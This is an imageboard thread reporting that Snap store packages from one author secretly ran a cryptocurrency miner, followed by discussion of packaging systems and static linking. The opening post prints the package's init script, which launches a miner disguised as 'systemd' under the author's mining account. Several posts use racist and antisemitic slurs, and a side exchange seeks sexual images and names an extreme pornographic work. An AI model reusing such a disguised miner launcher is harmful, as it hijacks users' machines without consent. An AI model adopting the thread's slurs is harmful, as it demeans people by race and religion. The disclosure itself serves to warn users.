[–]▶ No.913348>>913385 >>913658 [Watch Thread][Show All Posts]
Some Snaps (probably all) of Nicolas Tomb contains miner! This is the content of init script of 2048buntu package:
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}
Issue on github:
https://github.com/canonical-websites/snapcraft.io/issues/651
All snaps of Nicolas Tomb:
https://uappexplorer.com/snaps?q=author%3ANicolas+Tomb&sort=-points
Edit.
All Snaps of that author were removed from the store.
▶ No.913349>>913352
The icing on this shit cake is that the binary was named "systemd" to fool users.
▶ No.913351>>913357 >>913358
I've always been suspicious of Snaps and Flatpaks. Sounds like something right out of some shitty hipster startup from siliconeSJW valley. If your program requires some third party package distribution system then you might want to rethink your build system and dependency management. From wiki: The idea of using application containers in GNOME was first proposed in 2013 by Lennart Poettering. I knew it! Another great idea from our lord and savior Lennart.
▶ No.913352
>>913349
>it's systemd
>it must be good
The absolute state of systemd shills.
▶ No.913353>>913364
they wanted to shutdown discussion on this one asap.
seems a little early, considering malware was just found in their repos.
▶ No.913357>>914153
>>913351
Flatpak and AppImage are no worse than .deb/RPM and tarballs from a security standpoint. As always, you bypass your package manager at your own risk.
▶ No.913358>>913362 >>913365
>>913351
The idea for distro-agnostic packages have been around longer than that. Ever heard of fatELF?
https://icculus.org/fatelf/
▶ No.913362>>929216
>>913358
I vaguely remember Icculus pushing this back in the day. I forget exactly why it got rejected. FatElf was basically the Windows way of doing things shoehorned into Unix/Linux. Then again, this IS the guy to invented Mojo installers.
▶ No.913364>>913377
>>913353
Kinda late though. This has already blown up on the Linux Leddit.
▶ No.913365>>913367 >>913368
>>913358
>distro-agnostic packages
how about statically compiling all the libraries into the binary?
is this not distro-agnostic? will this not run on the majority of distro's with no dependency requirements?
i realize it's a pain in the ass to compile and results an an extremely bloated executable but who cares if some fuck is too lazy to install dependencies then he gets this.
▶ No.913367>>913386 >>914276
>>913365
glibc's static linking fucking sucks
▶ No.913368>>913386
>>913365
There is a good reason FatElf was rejected by Linus, whereas AppImage and Flatpak get his support.
▶ No.913371
▶ No.913374>>913456
>myfirstferrari
i hope they run him down
▶ No.913377>>913380
>>913364
>Leddit
link?
could not find anything about it, was it already deleted?
▶ No.913380>>913387 >>913388
▶ No.913382>>913394
Flatpak and AppImage have made life sticking to LTS releases MUCH easier. But yeah, we are going to have to hold Canonical and the Flathub guys to account when shit like this happens.
▶ No.913385
>>913348 (OP)
>some consumer mismash crapware has malware in it
well i mean, it was indistinguishable from malware in the first place but okay
▶ No.913386>>914276
>>913368
i'm not talking about fatelf. i'm not talking about multiple architectures, arm, x86, etc, in the same binary, just regular static compiled x86 binaries.
>>913367
what are the problems? i've only done it a couple of times and given I didn't test the result on 10 different distributions but i've never had problems.
▶ No.913387>>913389
>>913380
great, here's the solution. we need the equivalent of pozjew and chromium's forced add-on signing even for shit that isn't in the appstore, now on your desktop.
we need a bunch of kikes to sit and moderate software that is specifically not in the moderated package repositories. surely this will go well. this nigger did this on purpose to bring down censorship on flatpack and snaps or whatever the fuck else.
▶ No.913388>>913390 >>913636
>>913380
every time i go to reddit my blood pressure goes up 20 points.
▶ No.913389>>913395
>>913387
That isn't really technically possible though. I mean, you could make users jump through an extra hoop I suppose.
▶ No.913390>>913391
>>913388
I mean, depending on how old your distro is, compiling a new version of foo might not be an option. That said, I imagine this is how most casual Linux users see things.
▶ No.913391>>913392 >>913631
>>913390
i would say i'm too used to gentoo, but it's not difficult on debian/jewbuntu either.
apt-get build-dep poosoft
apt-get source poosoft
tar -xzf poosoft
cd poosoft
./configure
make -j1
checkinstall poosoft
▶ No.913392
>>913391
Not everything is that trivial to compile though.
▶ No.913394>>913398 >>913954
>>913382
Flathub hasn't had anything like this happen though. From here on, I'd say AppImage is a more likely Trojan horse for this kind of mining malware.
▶ No.913395
>>913389
it wouldn't surprise me if canonical patched the kernel to include a kosher signing check before every executable runs.
▶ No.913398
>>913394
That wouldn't have stopped this though. THEY are the ones who allowed it in their repo in the first place.
▶ No.913421>>913422
This is what you get for using proprietary software.
▶ No.913422>>913429
>>913421
The binary blob was snuck into the package. 2048 itself is free software.
▶ No.913429>>913432 >>913465 >>913509
This was inevitable, Canonical and the "Year of the Linux Desktop" faggots want Windows but the street cred of Linux, so they will turn GNU/Linux into Windows with all the malware. Android/Linux has the same problem even though Google has full control there, you just can't make sure that a proprietary blob is not malicious. But the business models of the platform owners rests on the masses executing arbitrary code from third parties so they will just sacrifice some suckers and pull the malware when there is an outcry.
>>913422
Not the snap version, thanks to submissive license.
▶ No.913432
>>913429
Snap is actually geared more to IOT than the Desktop. One of the main reasons they think it's better than Flatpak is because Flatpak actually is centered around desktop use cases.
▶ No.913456
>>913374
I wonder if they can find out exactly who this is.
▶ No.913465
>>913429
>submissive license
cuck licenses btfo again
▶ No.913509
>>913429
Common sense should avoid most of this shit though. Don't download the Krita AppImage from anyplace besides the Krita official or anywhere else they endorse.
▶ No.913631>>913635 >>913972
>>913391
>error : poosoft requires shitlib >= 1.3.37, found : 0.1
and of course upgrading to a new version of shitlib breaks five dozen other applications. Granted, you could compile the new shitlib and statically link against that, but you'll have to compile seven more dependencies for it, one of them requiring very exotic compiler flags to not crash every other minute.
▶ No.913635>>913972
>>913631
>and of course upgrading to a new version of shitlib
You can have multiple versions of the same library installed at the same time.
▶ No.913636>>913700
>>913388
What is wrong with compiling yourself only as the last resort? Not every software is as trivial as
./configure && make && make install
▶ No.913641>>913724
The problem here is that no one audtis the packages submitted to the Snap store, not Snap itself.
You can be sure that this has happened with PPA and AUR but nobody ever realized.
▶ No.913652
>obvious leddit copy-paste thread without archive links
>ByteCoin (BCN) has a nigger and a sandnigger in its developer team, and the overall community manager is likely a kike
>BCN is accused of being a (((scamcoin))) multiple times
▶ No.913658>>913661 >>913701 >>913709
>>913348 (OP)
>linux gets no viruses
▶ No.913661
>>913658
Never was this logical. Any package can contain a virus. Or even a python script you've downloaded from somewhere.
▶ No.913700
>>913636
Nevermind how much longer it can take for larger applications like the GIMP or Kdenlive.
▶ No.913701
>>913658
*Malware. Viruses replicate themselves into other systems. And ANY operating system can have malware made for it.
▶ No.913709>>913715
>>913658
Who told you that? It just has less relevant vulnerabilities and is less affected by malware.
▶ No.913715>>913953
▶ No.913724
>>913641
>it would have been stopped by audits
lol
▶ No.913856>>913867
Just when I was about to try out Kubuntu.
Did it come preinstalled?
▶ No.913867
>>913856
Snap comes preinstalled. These packages didn't.
This is only slightly more remarkable than "malware found on Google Play".
▶ No.913932>>913936 >>913971
gg freetards. If you pay for software, you don't get malware. Remember, if you're not the customer, you're the product.
▶ No.913936
>>913932
also remember to not use paid software which is proprietary. They can double dip with you being both the customer AND the product (without you even knowing it).
▶ No.913953
>>913715
And here's why you're retarded
>Linux hardly has any viruses. And that’s not like “Oh well, not very often, you know”. That’s like “If you’ve ever heard of a real Linux virus, please tell me”. Of course, a Linux virus is not impossible to get. However, Linux makes it very hard for this to happen, for several reasons:
Learn to read dumbfuck
>hardly has
>very hard for this to happen
>not impossible to get
▶ No.913954>>913974
>>913394
Keep posting these sexy women
▶ No.913971
>>913932
Most proprietary software is malware. Doesn't matter if you pay for it or not.
▶ No.913972
>>913631
>>913635
>and of course upgrading to a new version of shitlib breaks five dozen other applications.
this is why you install gentoo
▶ No.913974>>914254
>>913954
You don't want that. Trust me.
▶ No.914153>>914505
>>913357
digusting.
spoiler that shit.
▶ No.914254>>914327
>>913974
Do what I asked you to do pls
Also please include source
▶ No.914276
>>913367
You don't have to link against glibc. Link against musl or any non-bloated libc and it will still run in a glibc environment. The only thing a statically linked binary depends on is kernel interfaces being present, and we all know how autistic linus is about backwards compatibility (it why linux is such a bloated piece of shit).
>>913386
>what are the problems?
Ulrich drepper actively tries to make statically linking with glibc terrible. I can't find the articles right now though. In general however the meme about static linking producing huge binaries comes entirely from people linking against glibc. The smallest possible program( int main() {} ) statically linked with glibc is >600K.
▶ No.914327>>914407
>>914254
Stop. You are hurting me.
▶ No.914407>>914471
▶ No.914471>>914533
>>914407
It's ShindoL, some of the tags from that doujin are: mind break, torture, moral degradation, moral degeneration, snuff, guru, blackmail, drugs, and incest. If that still interests you then have fun anon.
▶ No.914505>>914542
>>914153
You can always tell a newfag from the way they sperg about Libbie and Kiki. Most useful.
▶ No.914533
>>914471
H-How did you know those tags turn me on? A-Are you the botnet?
▶ No.914542>>914579
>>914505
I only sperg about nigger Libbie.
▶ No.914579>>914644 >>914648
>>914542
Didn't do well in maff class, white boy?
▶ No.914644
>>914579
How is it possible to do well with a teacher like THAT? My grades would be solely determined by 'extracurricular activities'
▶ No.914648>>914714 >>931154
>>914579
To you this is an improvement of an actual nigger.
To me this is bestiality squared.
▶ No.914714
>>914648
Whatever you say, new friend.
▶ No.922141
Learn about the [code] tags, retard
▶ No.929209
▶ No.929216
>>913362
>fatelf
Nice pic related
▶ No.929838>>929844
You could have avoided this if you'd used the Guix package manager.
▶ No.929844
>>929838
Hipster trash worse than a toy package manager.
▶ No.929930
am I the only one who anticipates the massive hit of botnet coin miners?
sure sucks to be notech and normal at the botnet age
▶ No.931154
>>914648
I dunno, Maff seems alright to me.
▶ No.931176>>931182
Solution: Don't use Snappy, a package manager designed for proprietary, walled graden bullshit.
▶ No.931182
>>931176
Flatpak is currently more popular with most OSS application devs atm anyway.